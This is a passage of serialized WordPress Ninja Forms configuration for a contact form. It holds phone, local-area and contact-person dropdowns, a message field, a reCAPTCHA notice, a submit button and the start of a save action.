:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_193\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_193\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:249;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_194\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_194\";}s:2:\"id\";i:250;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Initiator-Kathy Neal\";s:5:\"value\";s:20:\"Initiator-Kathy Neal\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Lynnzie Sutton\";s:5:\"value\";s:24:\"Initiator-Lynnzie Sutton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"Initiator-Laurah Brock Young\";s:5:\"value\";s:28:\"Initiator-Laurah Brock Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166940171\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_197\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:253;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_198\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_198\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:254;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800713464\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"637\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_200\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_200\";}s:2:\"id\";i:256;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:04\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms 